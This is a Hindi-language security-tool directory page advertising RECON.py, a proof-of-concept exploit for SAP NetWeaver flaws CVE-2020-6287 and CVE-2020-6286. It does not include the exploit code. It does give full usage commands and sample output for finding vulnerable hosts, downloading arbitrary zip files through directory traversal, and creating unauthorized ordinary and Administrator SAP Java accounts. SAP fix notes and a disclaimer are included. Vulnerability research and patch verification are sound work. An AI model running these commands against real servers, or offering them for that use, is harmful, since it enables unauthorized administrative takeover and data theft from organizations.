Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SAP_RECON — CVE-2020-6287, CVE-2020-6286 के लिए PoC (SAP RECON भेद्यता) | Kitploit
उपकरण/GitHubGitHub/chipik/sap_recon
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubchipik/sap_recon

SAP_RECON

CVE-2020-6287, CVE-2020-6286 के लिए PoC (SAP RECON भेद्यता)

रिपॉजिटरी देखें
2236325 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-6287, CVE-2020-6286 (SAP RECON भेद्यता) के लिए PoC

Pffff! RECON (Remotely Exploitable Code On NetWeaver)? यारों, सच में? यही सबसे अच्छा कोडनेम था जो तुम लोगों ने सोचा? :)

यह स्क्रिप्ट SAP LM Configuration Wizard में अनुपलब्ध प्राधिकरण जाँच भेद्यता की जाँच करने की अनुमति देती है और एक PoC स्क्रिप्ट के रूप में queryProtocol विधि में directory traversal का शोषण करती है।

Directory traversal किसी भी zip को SAP सर्वर से डाउनलोड करने की अनुमति देता है।

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए बनाई गई है और इसका उपयोग कानून के उल्लंघन या व्यक्तिगत लाभ के लिए नहीं किया जा सकता।
इस परियोजना के लेखक इस परियोजना की सामग्री से होने वाले किसी भी संभावित नुकसान के लिए जिम्मेदार नहीं हैं

मूल खोज:

CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.

समाधान: #2934135, #2939665

उपयोग कैसे करें

बस SAP NW AS Java का होस्टनाम/आईपी दें।

अतिरिक्त विकल्प हैं:

  1. -c - जाँच करें कि क्या SAP सर्वर RECON के प्रति भेद्य है
  • -f - SAP सर्वर से zip फ़ाइल डाउनलोड करें
  • -u - Authenticated User भूमिका के साथ SAP JAVA उपयोगकर्ता बनाएँ
  • -a - Administrator भूमिका के साथ SAP JAVA उपयोगकर्ता बनाएँ
  • उदा.: zip फ़ाइल डाउनलोड करें

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -f /1111.zip
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Ok! File zipfile_929.zip was saved
    

    उदा.: SAP JAVA उपयोगकर्ता बनाएँ

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -u
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user. sapRpoc5484:Secure!PwD9379
    Ok! User were created
    

    उदा.: SAP JAVA Administrator उपयोगकर्ता बनाएँ

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -a
    Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
    Ok! Admin user were created
    

    सभी विकल्प

    root@kitploit:~
    ~python RECON.py -h
    usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
                    [-u] [-a] [--timeout TIMEOUT] [-v]
    
    PoC for CVE-2020-6287,  (RECON)
    This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
    Original finding:
    - Pablo Artuso. https://twitter.com/lmkalg
    - Yvan 'iggy' G https://twitter.com/_1ggy
    
    Thanks:
    - Spencer McIntyre https://twitter.com/zeroSteiner
    
    Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
    
    optional arguments:
      -h, --help            show this help message and exit
      -H HOST, --host HOST  Java NW host (default: 127.0.0.1)
      -P PORT, --port PORT  Java NW web port (default: tcp/50000)
      -p PROXY, --proxy PROXY
                            Use proxy (ex: 127.0.0.1:8080)
      -s, --ssl             enable SSL
      -c, --check           just detect vulnerability
      -f ZIPFILE, --zipfile ZIPFILE
                            ZIP file to read. CVE-2020-6286
      -u, --user            Create simple JAVA user. CVE-2020-6287
      -a, --admin           Create JAVA user with role "Administrator". CVE-2020-6287
      --timeout TIMEOUT     HTTP connection timeout in second (default: 10)
      -v, --verbose         verbose mode
    
    टूल डाउनलोड करें